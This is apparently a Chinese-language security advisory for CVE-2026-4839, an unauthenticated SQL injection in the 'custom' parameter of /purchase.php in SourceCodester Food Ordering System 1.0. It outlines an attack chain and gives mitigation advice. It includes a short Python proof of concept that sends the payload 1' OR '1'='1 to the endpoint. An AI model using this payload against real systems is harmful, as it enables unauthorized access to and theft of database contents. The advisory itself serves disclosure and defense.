CVE-2026-4839 CVSS 7.3 高危

CVE-2026-4839 SourceCodester Food Ordering System SQL注入漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4839

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Food Ordering System

漏洞概述

SourceCodester Food Ordering System 1.0版本存在SQL注入漏洞。该漏洞位于/purchase.php文件中，由于对参数“custom”的处理不当，攻击者无需认证即可远程发起攻击。成功利用该漏洞可能导致数据库信息泄露、数据篡改或服务拒绝响应。

技术细节

该漏洞源于应用程序在处理用户输入时缺乏足够的过滤或转义。具体而言，在/purchase.php文件的参数处理组件中，接收到的“custom”参数被直接拼接到SQL查询语句中执行，而未经过任何安全检查。由于CVSS向量显示PR:N（无需认证）和UI:N（无需交互），攻击者可以通过构造恶意的SQL语句，通过HTTP请求发送至受影响端点。这种基于布尔的盲注或联合查询注入，允许攻击者在数据库上下文中执行任意SQL命令，从而窃取敏感数据或绕过身份验证。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行SourceCodester Food Ordering System 1.0的目标服务器。

STEP 2

漏洞探测

攻击者向/purchase.php发送特制的HTTP请求，在custom参数中注入单引号等特殊字符，观察服务器响应以判断是否存在SQL注入。

STEP 3

漏洞利用

攻击者构造完整的SQL注入Payload（如UNION SELECT或布尔盲注语句），通过custom参数提交，诱导后端数据库执行恶意命令。

STEP 4

数据窃取或破坏

利用数据库返回的信息获取管理员凭据、用户数据等敏感信息，或进行删除/篡改操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sql_injection(url):
    # Target endpoint
    target = f"{url}/purchase.php"
    # Simple SQL injection payload to test vulnerability
    payload = "1' OR '1'='1"
    
    params = {
        "custom": payload
    }
    
    try:
        response = requests.get(target, params=params, timeout=5)
        # Check if the response indicates a successful SQL injection
        # (e.g., returns unexpected data or takes longer due to sleep)
        if response.status_code == 200:
            print(f"[+] Potential SQL Injection found at {target}")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print(f"[-] No immediate vulnerability detected, status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target_url = "http://target-ip"  # Replace with actual target
    check_sql_injection(target_url)

影响范围

SourceCodester Food Ordering System 1.0

防御指南

临时缓解措施

建议立即检查系统是否使用了受影响的SourceCodester Food Ordering System 1.0版本。在升级修复前，应限制对/purchase.php接口的外网访问，或通过WAF添加规则，过滤包含SQL关键字（如SELECT, UNION, OR）和特殊符号（如'）的请求参数，以阻断攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4839
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4839
3 Details https://www.cvedetails.com/cve/CVE-2026-4839/
4 VulDB https://vuldb.com/cve/CVE-2026-4839
5 Link https://github.com/WHOAMI-xiaoyu/CVE/blob/main/CVE_9.md
6 Link https://vuldb.com/?ctiid.353142
7 Link https://vuldb.com/?id.353142
8 Link https://vuldb.com/?submit.776082
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表